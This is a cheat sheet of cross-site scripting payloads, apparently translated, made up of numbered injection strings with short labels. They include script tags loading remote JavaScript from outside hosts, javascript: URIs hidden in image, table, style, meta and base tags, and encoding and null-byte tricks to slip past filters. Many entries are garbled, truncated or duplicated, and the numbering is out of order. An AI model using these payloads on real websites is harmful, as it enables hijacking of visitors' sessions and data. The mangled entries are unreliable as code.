(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert boxes
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolons or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>
(11) Embedded tab splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line injected JavaScript, an extreme XSS example
<IMG SRC=\'#\'" /span>
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escape filters
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>